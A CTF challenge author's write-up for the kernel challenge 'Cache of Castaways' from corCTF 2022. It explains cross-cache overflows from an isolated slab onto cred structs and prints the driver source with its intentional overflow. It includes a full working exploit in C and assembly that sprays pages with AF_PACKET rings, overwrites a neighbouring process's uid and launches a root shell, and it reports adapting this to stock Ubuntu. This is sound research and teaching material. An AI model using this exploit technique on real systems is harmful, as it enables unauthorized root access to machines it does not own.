Last year in corCTF 2021, D3v17 and I wrote two kernel challenges demonstrating the power of msg_msg: Fire of Salvation and Wall of Perdition. These turned out to showcase a really powerful technique that has since been repeatedly utilized in real world exploits.
For this year’s edition, we followed a similar trend and designed
challenges that require techniques seen before in real world exploits
(and not CTFs). I wrote Cache of Castaways, which requires a cross cache attack against cred structs in their isolated slabs. The attack uses a simplistic and leakless data-only approach applicable to systems with low noise. D3v17 wrote CoRJail, which requires a Docker escape and a novel approach of abusing poll_list objects for an arbitrary free primitive through their slow path setup.
For my challenge, a standard CTF kernel setup was given along with the kernel compilation config. SMAP, SMEP, KPTI, KASLR, and many other standard kernel mitigations were on - I even disabled msg_msg for difficulty's sake. The kernel version used was 5.18.3, booted with 1 CPU and 4 GB of RAM. You can download the challenge with the included driver in the corCTF 2022 archive repo.
Here is the source of the CTF driver (I did not provide source during the competition as reversing this is quite simple):
MODULE_DESCRIPTION("a castaway cache, a secluded slab, a marooned memory"); MODULE_LICENSE("GPL"); MODULE_AUTHOR("FizzBuzz101"); typedef struct { int64_t idx; uint64_t size; char *buf; }user_req_t; int castaway_ctr = 0; typedef struct { char pad[OVERFLOW_SZ]; char buf[]; }castaway_t; struct castaway_cache { char buf[CHUNK_SIZE]; }; static DEFINE_MUTEX(castaway_lock); castaway_t **castaway_arr; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static long castaway_add(void); static long castaway_edit(int64_t idx, uint64_t size, char *buf); static struct miscdevice castaway_dev; static struct file_operations castaway_fops = {.unlocked_ioctl = castaway_ioctl}; static struct kmem_cache *castaway_cachep; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { user_req_t req; long ret = 0; if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req))) { return -1; } mutex_lock(&castaway_lock); switch (cmd) { case ALLOC: ret = castaway_add(); break; case EDIT: ret = castaway_edit(req.idx, req.size, req.buf); break; default: ret = -1; } mutex_unlock(&castaway_lock); return ret; } static long castaway_add(void) { int idx; if (castaway_ctr >= MAX) { goto failure_add; } idx = castaway_ctr++; castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT); if (!castaway_arr[idx]) { goto failure_add; } return idx; failure_add: printk(KERN_INFO "castaway chunk allocation failed\n"); return -1; } static long castaway_edit(int64_t idx, uint64_t size, char *buf) { char temp[CHUNK_SIZE]; if (idx < 0 || idx >= MAX || !castaway_arr[idx]) { goto edit_fail; } if (size > CHUNK_SIZE || copy_from_user(temp, buf, size)) { goto edit_fail; } memcpy(castaway_arr[idx]->buf, temp, size); return size; edit_fail: printk(KERN_INFO "castaway chunk editing failed\n"); return -1; } static int init_castaway_driver(void) { castaway_dev.minor = MISC_DYNAMIC_MINOR; castaway_dev.name = DEVICE_NAME; castaway_dev.fops = &castaway_fops; castaway_dev.mode = 0644; mutex_init(&castaway_lock); if (misc_register(&castaway_dev)) { return -1; } castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); if (!castaway_arr) { return -1; } castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); if (!castaway_cachep) { return -1; } printk(KERN_INFO "All alone in an castaway cache... \n"); printk(KERN_INFO "There's no way a pwner can escape!\n"); return 0; } static void cleanup_castaway_driver(void) { int i; misc_deregister(&castaway_dev); mutex_destroy(&castaway_lock); for (i = 0; i < MAX; i++) { if (castaway_arr[i]) { kfree(castaway_arr[i]); } } kfree(castaway_arr); printk(KERN_INFO "Guess you remain a castaway\n"); } module_init(init_castaway_driver); module_exit(cleanup_castaway_driver);
There are only two ioctl commands: one for adding a chunk (all objects in the driver are 512 bytes in size), and one for editing a chunk, which has a clear 6 byte overflow. Only 400 allocations are given in total. As with last year, none of the bugs in our kernel challenges are extremely difficult to find, as we wanted to focus on exploitation difficulty.
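To make the interface concrete, here is a rough sketch of how userspace drives the two commands; the ALLOC and EDIT command values below are hypothetical placeholders for the real ones defined in the challenge header, so treat this as illustrative rather than a drop-in PoC:

#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>

#define ALLOC 0xcafeb001       /* hypothetical command value - the real one is in the header */
#define EDIT  0xcafeb003       /* hypothetical command value - the real one is in the header */
#define CHUNK_SIZE 512         /* slab object size used by the driver */

typedef struct {
    int64_t idx;
    uint64_t size;
    char *buf;
} user_req_t;

int main(void)
{
    char payload[CHUNK_SIZE] = {0};
    int fd = open("/dev/castaway", O_RDONLY);

    long idx = ioctl(fd, ALLOC, 0);   /* allocate one 512 byte object in the isolated cache */

    /* the writable buf starts 6 bytes into the object, so a full-size edit
     * writes 6 bytes past the end of the slab chunk */
    user_req_t req = {.idx = idx, .size = CHUNK_SIZE, .buf = payload};
    ioctl(fd, EDIT, (unsigned long)&req);
    return 0;
}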
Under normal circumstances, a 6 byte overflow in a kernel object
should be quite exploitable. However, the given object is allocated in
an isolated slab cache, created with the flags SLAB_PANIC | SLAB_ACCOUNT
. Combined with the fact that I compiled with CONFIG_MEMCG_KMEM
support, allocations from this cache come from its own separate slabs, away from the generic kmalloc-512 slabs, as duasynt documents. Otherwise, the kernel could alias this cache with others sharing similar properties based on the find_mergeable function (though this would still not be a problem in this challenge, because I disabled CONFIG_SLAB_MERGE_DEFAULT).
Not only is there freelist randomization and hardening, but the Linux kernel has also moved freelist pointers to the middle of each free chunk. The driver's object also contains neither data pointers nor function pointers. How can one exploit this 6 byte overflow?
The answer is cross cache overflows. I found resources on this strategy quite scarce, and I haven't personally seen a CTF challenge that requires it. This technique is increasingly common in real world exploits, as evidenced by CVE-2022-27666 or StarLabs' kCTF msg_msg exploit for CVE-2022-0185. Other articles that inspired this idea were grsecurity's post on AUTOSLAB and this post on kmalloc internals. Funnily enough, a writeup discussing cross cache attacks for yet another CVE came out the day right before our CTF began: CVE-2022-29582.
Those articles talk about this technique in greater detail, so I advise you to read them beforehand.
To summarize on my end, kmalloc slab allocations are backed by the underlying buddy allocator. When there are no slabs with available chunks left in the requested kmalloc cache, the allocator requests an order-n page from the buddy allocator - it calls new_slab, which leads to allocate_slab. This in turn triggers a page request from the buddy allocator via alloc_page in alloc_slab_page.
The buddy allocator maintains an array of FIFO queues of free pages, one per order. An order-n page is just a physically contiguous chunk whose size is the page size multiplied by 2 to the power of n. When you free a chunk and it results in a completely empty slab, the slab allocator can return the underlying page(s) back to the buddy allocator.
The order of the underlying slab pages depends on a multitude of factors, including the size of the slab chunks, system specifications, and the kernel build - in practice, you can easily determine it by just looking at /proc/slabinfo (the pagesperslab field). For this challenge, the slabs holding the isolated 512 byte objects use order-0 pages.
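If you want to check this yourself, a quick helper like the one below (just a sketch; reading /proc/slabinfo generally requires root) prints the slabinfo line for a given cache so you can read off its objperslab and pagesperslab fields:

/* Print the /proc/slabinfo line for the cache name given as argv[1]. */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : "cred_jar";
    char line[512];
    FILE *f = fopen("/proc/slabinfo", "r");

    if (!f) {
        perror("fopen /proc/slabinfo");
        return 1;
    }
    while (fgets(line, sizeof(line), f)) {
        if (!strncmp(line, target, strlen(target)))
            printf("%s", line);
    }
    fclose(f);
    return 0;
}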
An important insight for cross cache overflows and page allocator level massage is the behavior of buddy allocators when a requested order’s queue is empty. In this case, the buddy allocator attempts to find a page from order n+1 and splits it in half, bringing these buddy pages into order n. If such a higher order buddy page does not exist, it just looks at the next order and so forth. When a page returns to the buddy allocator and its corresponding buddy page is also in the same queue, they are merged and move into the next order’s queue (and the same process can continue from there).
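To make the splitting behavior concrete, here is a tiny toy model of the order queues (purely illustrative, not kernel code): when the requested order's queue is empty, a page is pulled from the next order up and split into two buddies.

/* Toy model of buddy order handling - illustrative only, not kernel code. */
#include <stdio.h>

#define MAX_ORDER 11
static int free_count[MAX_ORDER];        /* free pages available per order */

/* take one page of the requested order, splitting higher orders if needed */
static int take_page(int order)
{
    if (order >= MAX_ORDER)
        return -1;                       /* nothing left in this toy model */
    if (free_count[order] == 0) {
        if (take_page(order + 1) < 0)    /* grab one page from order n+1 */
            return -1;
        free_count[order] += 2;          /* split it into two order-n buddies */
    }
    free_count[order]--;
    return 0;
}

int main(void)
{
    free_count[2] = 1;                   /* start: one free order-2 page only */
    take_page(0);                        /* forces splits: order 2 -> 1 -> 0 */
    printf("order0=%d order1=%d order2=%d\n",
           free_count[0], free_count[1], free_count[2]);   /* prints 1 1 0 */
    return 0;
}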
In many previous cross cache overflow exploits, the pattern is to overflow from a slab without known abusable objects onto a slab with abusable objects. It is also possible to abuse this cross cache principle for UAF bugs. Most known exploits rely on target objects in pages of order greater than 0 due to the lower amount of noise there and the improved stability. However, this doesn't make cross cache overflows onto order 0 pages impossible, especially if system noise is low. Order 0 would be a nice target because it would unlock even more abusable objects on this system, like the famous 128 byte sized cred struct. For those unfamiliar with the cred object, it basically determines process privileges within its first few qwords.
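For reference, the start of struct cred looks roughly like this (abridged from include/linux/cred.h, with config-dependent debug fields omitted) - note that the reference count and the various ids sit in the very first bytes of the object:

struct cred {
	atomic_t	usage;		/* reference count               */
	kuid_t		uid;		/* real UID of the task          */
	kgid_t		gid;		/* real GID of the task          */
	kuid_t		suid;		/* saved UID of the task         */
	kgid_t		sgid;		/* saved GID of the task         */
	kuid_t		euid;		/* effective UID of the task     */
	kgid_t		egid;		/* effective GID of the task     */
	kuid_t		fsuid;		/* UID for VFS ops               */
	kgid_t		fsgid;		/* GID for VFS ops               */
	unsigned	securebits;	/* SUID-less security management */
	/* ... capabilities, keyrings, security pointers, etc. ... */
};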
One of my earliest memories in kernel exploitation is learning that rooting a system by overflowing a cred struct is impossible because of its slab isolation in the cred_jar cache. Once I learned about cross cache overflows, I knew I just had to write a challenge to see whether attacking cred structs is feasible.
The high level strategy of my exploit is the following: drain the cred_jar cache so that future cred allocations pull fresh order 0 pages from the buddy allocator, drain many higher order pages into order 0 pages, free some of them in a manner that avoids buddy page merging, spray more cred objects, free more of the held pages, and finally spray allocations of the vulnerable object to overflow onto at least one cred object (a page of vulnerable objects must be allocated directly adjacent to a cred slab). The nice thing about this approach is its elegance - KASLR leaks, arbitrary read/write, and ROP chains are not needed! It is a simple, leakless, and data-only approach!
To trigger cred object allocations, one just needs to fork. Though a standard fork does cause a lot of noise, as many other allocations occur alongside it, this does not matter for the initial spray in my exploit.
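As a minimal illustration (this is essentially what the initial spray in the final exploit does), a loop like the following churns out cred objects:

/* Minimal cred_jar drain sketch: every fork() allocates a fresh struct cred via
 * copy_creds() -> prepare_creds(); children just block so their creds stay live. */
#include <sys/types.h>
#include <unistd.h>

void drain_cred_jar(int count)
{
    for (int i = 0; i < count; i++) {
        pid_t pid = fork();
        if (pid == 0) {
            pause();        /* keep this child's cred object allocated */
            _exit(0);
        }
        if (pid < 0)
            break;          /* hit the process limit */
    }
}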
As the driver only allows a limited number of 512 byte allocations (400 in total, so about 50 pages, as there are 8 objects per slab) and has no freeing option, a better page spraying primitive is required. The trick here
generally is to just look for functions that reference page allocator
functions, such as __get_free_pages
, alloc_page
, or alloc_pages
. D3v17 mentioned a really nice one to me based upon a page allocating primitive from CVE-2017-7308 documented in this p0 writeup. If you use setsockopt
to set packet version to TPACKET_V1
/TPACKET_V2
, and then use the same syscall to initialize a PACKET_TX_RING
(which creates a ring buffer used with PACKET_MMAP
for improved transmission through userspace mapped buffers for packets), then you will hit this line in packet_setsockopt
. Note that the p0 writeup used PACKET_RX_RING
, but PACKET_TX_RING
gives us the same results for the purposes of page allocator control.
	case PACKET_RX_RING:
	case PACKET_TX_RING:
	{
		union tpacket_req_u req_u;
		int len;

		lock_sock(sk);
		switch (po->tp_version) {
		case TPACKET_V1:
		case TPACKET_V2:
			len = sizeof(req_u.req);
			break;
		case TPACKET_V3:
		default:
			len = sizeof(req_u.req3);
			break;
		}
		if (optlen < len) {
			ret = -EINVAL;
		} else {
			if (copy_from_sockptr(&req_u.req, optval, len))
				ret = -EFAULT;
			else
				ret = packet_set_ring(sk, &req_u, 0,
						      optname == PACKET_TX_RING);
		}
		release_sock(sk);
		return ret;
	}
This case calls packet_set_ring using the provided tpacket_req_u union, which then calls alloc_pg_vec. The arguments here are the tpacket_req struct pulled from the union, as well as the order derived from the struct's tp_block_size. This latter function calls alloc_one_pg_vec_page tp_block_nr times, each of which leads to a __get_free_pages call.
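For reference, alloc_pg_vec looks roughly like the following (paraphrased from net/packet/af_packet.c from memory, so check the actual kernel source for exact details):

/* Paraphrased sketch of net/packet/af_packet.c:alloc_pg_vec() - not a verbatim copy. */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
	unsigned int block_nr = req->tp_block_nr;
	struct pgv *pg_vec;
	int i;

	pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
	if (unlikely(!pg_vec))
		goto out;

	/* one page allocation of the requested order per block */
	for (i = 0; i < block_nr; i++) {
		pg_vec[i].buffer = alloc_one_pg_vec_page(order);
		if (unlikely(!pg_vec[i].buffer))
			goto out_free_pgvec;
	}

out:
	return pg_vec;

out_free_pgvec:
	free_pg_vec(pg_vec, order, block_nr);
	pg_vec = NULL;
	goto out;
}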
What the above primitive gives us is the ability to drain tp_block_nr pages of order n (where n is determined by tp_block_size), and to free those tp_block_nr pages again by closing the socket fd. The only issue is that low privileged users can't use these socket functions in the root network namespace by default, but we can usually create our own unprivileged user namespaces on many Linux systems. There are definitely alternative methods to drain pages (most likely ones that don't need namespaces, either). Another approach to page draining would be to repeatedly spray object allocations (like msg_msg, which I disabled), though it might be less reliable if the object lives in a shared slab.
Another important point to address now for the exploit is the noise that fork (or clone with equivalent flags) causes. Every time you fork, many allocations (from both kmalloc and the buddy allocator) occur.
The core function for process creation is kernel_clone. Keep in mind that a traditional fork has no flags set in kernel_clone_args. The following then happens:
1. kernel_clone calls copy_process.

2. copy_process calls dup_task_struct. This allocates a task_struct from its own cache (which relies on order 2 pages on the target system). Then, it calls alloc_thread_stack_node, which uses __vmalloc_node_range to allocate a 16kb virtually contiguous region for the kernel thread stack if no cached stacks are available. This usually allocates away 4 order 0 pages.
3. The above vmalloc call allocates a kmalloc-64 chunk to help set up the vmalloc virtual mappings. Following this, the kernel allocates vmap_area chunks from vmap_area_cachep. On this system and kernel, there were two, with the first coming from alloc_vmap_area. I am not completely sure where the second vmap_area allocation was triggered from - I suspect it came from preload_this_cpu_lock. Debugging confirmed this hypothesis on this setup and showed that it does not hit the subsequent free path.
4. Then copy_process
calls copy_creds
, which triggers a cred object (our desired target) allocation from prepare_creds
. This occurs as long as the CLONE_THREAD
flag isn’t set.
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
	struct cred *new;
	int ret;

	p->cached_requested_key = NULL;

	if (
		!p->cred->thread_keyring &&
		clone_flags & CLONE_THREAD
	    ) {
		p->real_cred = get_cred(p->cred);
		get_cred(p->cred);
		alter_cred_subscribers(p->cred, 2);
		kdebug("share_creds(%p{%d,%d})",
		       p->cred, atomic_read(&p->cred->usage),
		       read_cred_subscribers(p->cred));
		inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1);
		return 0;
	}

	new = prepare_creds();
	if (!new)
		return -ENOMEM;
5. Starting from this section of copy_process, a series of copy_x functions (where x is some process attribute) begins. All of them will trigger an allocation, unless their respective CLONE flags are set. In a normal fork, one would expect a new chunk to be allocated from files_cache, fs_cache, sighand_cache, and signal_cache. The largest source of noise is the setup of mm_struct, which triggers as long as CLONE_VM isn't set. This in turn causes a lot of allocation activity in caches like vm_area_struct, anon_vma_chain, and anon_vma. All of these allocations are backed by order 0 pages on this system.
	retval = copy_semundo(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_security;
	retval = copy_files(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_semundo;
	retval = copy_fs(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_files;
	retval = copy_sighand(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_fs;
	retval = copy_signal(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_sighand;
	retval = copy_mm(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_signal;
	retval = copy_namespaces(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_mm;
	retval = copy_io(clone_flags, p);
	if (retval)
		goto bad_fork_cleanup_namespaces;
	retval = copy_thread(clone_flags, args->stack, args->stack_size, p, args->tls);
	if (retval)
		goto bad_fork_cleanup_io;
6. Lastly, the kernel allocates a pid chunk - its slab requires an order 0 page.
There are definitely more details and steps I missed, but the above should suffice for the context of this writeup. The exact caches involved and their properties might also differ on other systems, depending on slab mergeability and the required page sizes.
Ignoring page allocations from calls like vmalloc and just looking at slab allocations, a single fork would trigger this pattern in this system:
task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
files_cache
fs_cache
sighand_cache
signal_cache
mm_struct
vm_area_struct
vm_area_struct
vm_area_struct
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
anon_vma_chain
anon_vma
anon_vma_chain
vm_area_struct
vm_area_struct
pid
Based on our earlier source analysis and the clone manpage, I managed to drastically reduce this noise with the following flags: CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND. Now, cloning only produces this series of slab allocations:
task_struct
kmalloc-64
vmap_area
vmap_area
cred_jar
signal_cache
pid
Note that there will still be the 4 order 0 page allocations from vmalloc as well. Regardless, this noise level is much more acceptable. The only issue now is that our child processes cannot really write to process memory, as they share the same virtual memory with the parent, so we have to use shellcode dependent only on registers to check for successful privilege escalation.
Knowing all of this, we can formulate an exploit now.
Using the initial setsockopt page spray technique, I requested many order 0 pages and freed every other one of them. This left me with a lot of free order 0 pages that would not be coalesced into order 1 pages. I had the exploit fork a helper process into its own user namespace (where it has the necessary privileges) in order to utilize these page level spraying primitives.
Then, I called clone many times with the above flags to trigger the creation of cred objects, freed the remaining held order 0 pages, and sprayed allocations of the vulnerable object to create a scenario where a page of vulnerable objects sits directly adjacent to a page of cred objects. Note that this isn't structured in a way that exactly follows the allocation behavior seen in fork - we would also be allocating adjacent to all the other order 0 backed allocations mentioned above (pages for vmalloc, the pid slab, the vmap_area slab, etc.). However, the differences should eventually align a vulnerable page right against a cred slab (and it turned out that they did!) to create the adjacency scenario. I would assume the overflow also hit other chunks, which might result in horrible crashes, but I rarely experienced this - I am not exactly sure why.
I overflowed all of the vulnerable objects with the following payload: 4 bytes that represent 1, followed by 2 bytes that represent 0. The first 4 bytes keep the usage field sane for kernel checks, while the next 2 bytes zero out the lower half of the uid field (as Linux uids don't go above 65535, the upper half is already zero). After this overflow spray, I pipe a message to all the forks - each of them then checks its uid and drops a shell if it is root.
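Concretely, the 6 overflow bytes line up with the start of the adjacent cred struct as sketched below (this mirrors the single line in the exploit that builds the payload):

#define CHUNK_SIZE 512   /* size of the vulnerable slab object */

/* The edit ioctl copies CHUNK_SIZE bytes starting 6 bytes into the object,
 * so the final 6 bytes of the buffer land on whatever follows the object. */
unsigned char evil[CHUNK_SIZE] = {0};

void build_payload(void)
{
    *(unsigned int   *)&evil[CHUNK_SIZE - 6] = 1; /* cred->usage = 1: a sane refcount */
    *(unsigned short *)&evil[CHUNK_SIZE - 2] = 0; /* low 16 bits of cred->uid -> 0    */
}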
Below is my final exploit, which effectively has a 100% success rate.
typedef struct
{
    int64_t idx;
    uint64_t size;
    char *buf;
}user_req_t;

struct tpacket_req
{
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

enum tpacket_versions
{
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

typedef struct
{
    bool in_use;
    int idx[ISO_SLAB_LIMIT];
}full_page;

enum spray_cmd
{
    ALLOC_PAGE,
    FREE_PAGE,
    EXIT_SPRAY,
};

typedef struct
{
    enum spray_cmd cmd;
    int32_t idx;
}ipc_req_t;

full_page isolation_pages[FINAL_PAGE_SPRAY] = {0};
int rootfd[2];
int sprayfd_child[2];
int sprayfd_parent[2];
int socketfds[INITIAL_PAGE_SPRAY];

int64_t ioctl(int fd, unsigned long request, unsigned long param)
{
    long result = syscall(16, fd, request, param);
    if (result < 0)
        perror("ioctl on driver");
    return result;
}

int64_t alloc(int fd)
{
    return ioctl(fd, ALLOC, 0);
}

int64_t delete(int fd, int64_t idx)
{
    user_req_t req = {0};
    req.idx = idx;
    return ioctl(fd, DELETE, (unsigned long)&req);
}

int64_t edit(int fd, int64_t idx, uint64_t size, char *buf)
{
    user_req_t req = {.idx = idx, .size = size, .buf = buf};
    return ioctl(fd, EDIT, (unsigned long)&req);
}

void debug()
{
    puts("pause");
    getchar();
    return;
}

void unshare_setup(uid_t uid, gid_t gid)
{
    int temp;
    char edit[0x100];

    unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET);

    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);

    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    write(temp, edit, strlen(edit));
    close(temp);

    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    write(temp, edit, strlen(edit));
    close(temp);

    return;
}

// https://man7.org/linux/man-pages/man2/clone.2.html
__attribute__((naked)) pid_t __clone(uint64_t flags, void *dest)
{
    asm("mov r15, rsi;"
        "xor rsi, rsi;"
        "xor rdx, rdx;"
        "xor r10, r10;"
        "xor r9, r9;"
        "mov rax, 56;"
        "syscall;"
        "cmp rax, 0;"
        "jl bad_end;"
        "jg good_end;"
        "jmp r15;"
        "bad_end:"
        "neg rax;"
        "ret;"
        "good_end:"
        "ret;");
}

struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0};
char throwaway;
char root[] = "root\n";
char binsh[] = "/bin/sh\x00";
char *args[] = {"/bin/sh", NULL};

__attribute__((naked)) void check_and_wait()
{
    asm(
        "lea rax, [rootfd];"
        "mov edi, dword ptr [rax];"
        "lea rsi, [throwaway];"
        "mov rdx, 1;"
        "xor rax, rax;"
        "syscall;"
        "mov rax, 102;"
        "syscall;"
        "cmp rax, 0;"
        "jne finish;"
        "mov rdi, 1;"
        "lea rsi, [root];"
        "mov rdx, 5;"
        "mov rax, 1;"
        "syscall;"
        "lea rdi, [binsh];"
        "lea rsi, [args];"
        "xor rdx, rdx;"
        "mov rax, 59;"
        "syscall;"
        "finish:"
        "lea rdi, [timer];"
        "xor rsi, rsi;"
        "mov rax, 35;"
        "syscall;"
        "ret;");
}

int just_wait()
{
    sleep(1000000000);
}

// https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
int alloc_pages_via_sock(uint32_t size, uint32_t n)
{
    struct tpacket_req req;
    int32_t socketfd, version;

    socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socketfd < 0)
    {
        perror("bad socket");
        exit(-1);
    }

    version = TPACKET_V1;
    if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
    {
        perror("setsockopt PACKET_VERSION failed");
        exit(-1);
    }

    assert(size % 4096 == 0);

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = n;
    req.tp_frame_size = 4096;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
    {
        perror("setsockopt PACKET_TX_RING failed");
        exit(-1);
    }

    return socketfd;
}

void spray_comm_handler()
{
    ipc_req_t req;
    int32_t result;

    do
    {
        read(sprayfd_child[0], &req, sizeof(req));
        assert(req.idx < INITIAL_PAGE_SPRAY);
        if (req.cmd == ALLOC_PAGE)
        {
            socketfds[req.idx] = alloc_pages_via_sock(4096, 1);
        }
        else if (req.cmd == FREE_PAGE)
        {
            close(socketfds[req.idx]);
        }
        result = req.idx;
        write(sprayfd_parent[1], &result, sizeof(result));
    } while(req.cmd != EXIT_SPRAY);
}

void send_spray_cmd(enum spray_cmd cmd, int idx)
{
    ipc_req_t req;
    int32_t result;

    req.cmd = cmd;
    req.idx = idx;
    write(sprayfd_child[1], &req, sizeof(req));
    read(sprayfd_parent[0], &result, sizeof(result));
    assert(result == idx);
}

void alloc_vuln_page(int fd, full_page *arr, int page_idx)
{
    assert(!arr[page_idx].in_use);
    for (int i = 0; i < ISO_SLAB_LIMIT; i++)
    {
        long result = alloc(fd);
        if (result < 0)
        {
            perror("allocation error");
            exit(-1);
        }
        arr[page_idx].idx[i] = result;
    }
    arr[page_idx].in_use = true;
}

void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz)
{
    assert(arr[page_idx].in_use);
    for (int i = 0; i < ISO_SLAB_LIMIT; i++)
    {
        long result = edit(fd, arr[page_idx].idx[i], sz, buf);
        if (result < 0)
        {
            perror("free error");
            exit(-1);
        }
    }
}

int main(int argc, char **argv)
{
    int fd = open("/dev/castaway", O_RDONLY);
    if (fd < 0)
    {
        perror("driver can't be opened");
        exit(0);
    }

    // for communicating with spraying in separate namespace via TX_RINGs
    pipe(sprayfd_child);
    pipe(sprayfd_parent);

    puts("setting up spray manager in separate namespace");
    if (!fork())
    {
        unshare_setup(getuid(), getgid());
        spray_comm_handler();
    }

    // for communicating with the fork later
    pipe(rootfd);

    char evil[CHUNK_SIZE];
    memset(evil, 0, sizeof(evil));

    // initial drain
    puts("draining cred_jar");
    for (int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++)
    {
        pid_t result = fork();
        if (!result)
        {
            just_wait();
        }
        if (result < 0)
        {
            puts("fork limit");
            exit(-1);
        }
    }

    // buddy allocator massage
    puts("massaging order 0 buddy allocations");
    for (int i = 0; i < INITIAL_PAGE_SPRAY; i++)
    {
        send_spray_cmd(ALLOC_PAGE, i);
    }
    for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2)
    {
        send_spray_cmd(FREE_PAGE, i);
    }

    for (int i = 0; i < FORK_SPRAY; i++)
    {
        pid_t result = __clone(CLONE_FLAGS, &check_and_wait);
        if (result < 0)
        {
            perror("clone error");
            exit(-1);
        }
    }

    for (int i = 0; i < INITIAL_PAGE_SPRAY; i += 2)
    {
        send_spray_cmd(FREE_PAGE, i);
    }

    *(uint32_t*)&evil[CHUNK_SIZE-0x6] = 1;

    // cross cache overflow
    puts("spraying cross cache overflow");
    for (int i = 0; i < FINAL_PAGE_SPRAY; i++)
    {
        alloc_vuln_page(fd, isolation_pages, i);
        edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE);
    }

    puts("notifying forks that spray is completed");
    write(rootfd[1], evil, FORK_SPRAY);

    sleep(100000);
    exit(0);
}
Congratulations to kylebot and pql
for taking first and second blood respectively during the competition!
Kylebot did not target the cred struct - he cross cached onto seq_file objects for an arbitrary read to leak driver addresses and for an arbitrary free against castaway_arr to build UAF and arbitrary write primitives. pql did target the cred struct with a cross cache overflow, but in a different and more stable way. His exploit relied on setuid, which triggers prepare_creds and allocates cred objects, thereby prepopulating cred_jar slabs. This way, the exploit can trigger allocations of such pages without much noise and then fork to retake them. I personally never expected that function to allocate these objects, as I thought it would just run permission checks and mutate the cred in place, but it seems the lesson here is to always check the source. Overall, there did seem to be a notion beforehand among solvers (and other kernel pwners I talked with) that targeting cred structs in a cross cache overflow scenario would be quite difficult, if not nearly impossible, so it is quite nice to see it come to fruition.
After the CTF, I was curious to see whether this technique is applicable to a real Linux system that isn't just a minimalistic busybox setup. To test, I set up a single core default Ubuntu HWE 20.04 server VM with 4 GB of RAM and KVM enabled. Surprisingly, upon testing the exploit on the system with the challenge driver loaded, only two changes were required.
For one, I had to increase the FINAL_PAGE_SPRAY macro to 50, which makes sense as this setup is an actual Linux distro with more moving parts. The other change was to adjust for Ubuntu's CONFIG_SCHED_STACK_END_CHECK kernel option. As many of my overflows wrote into kernel stacks, the payload would cause this stack end check to fail. The check is just this macro:
#define task_stack_end_corrupted(task) \
	(*(end_of_stack(task)) != STACK_END_MAGIC)
STACK_END_MAGIC is the 4 byte value 0x57AC6E9D. Our payload just includes this value instead of 1, as it is still a valid value for the usage field.
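The tweak to the earlier payload sketch is a one-liner - the first store in build_payload becomes (again just illustrative):

#define STACK_END_MAGIC 0x57AC6E9D   /* the kernel's stack end marker value */

/* If the overflow happens to land on the end of a kernel stack instead of a cred
 * struct, this value keeps CONFIG_SCHED_STACK_END_CHECK happy - and it still
 * serves as a sane cred->usage value when it does hit a cred struct. */
*(unsigned int *)&evil[CHUNK_SIZE - 6] = STACK_END_MAGIC;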
With those changes, we have a working exploit against the CTF challenge driver on a real distro using this technique. The success rate is around 50%, but consider that I barely adjusted anything from the original spray I used - more fine grained adjustments would likely lead to a better success rate.
As for a multicore setup, the isolated slab of 512 byte chunks was backed by an order 1 page. This would require re-designing the spray (and setting core affinity due to per-CPU SLUB lists), but I hypothesize that the core concept should still hold.
Anyways, I think this is a really cool kernel exploit technique - leakless, data-only, all the pwn buzzwords! A huge thanks must also go to D3v17 and Markak for providing feedback on this writeup beforehand. Feel free to inform me if there are any confusing explanations or incorrect information in this writeup, and do let me know if you manage to use this technique in a real world exploit!
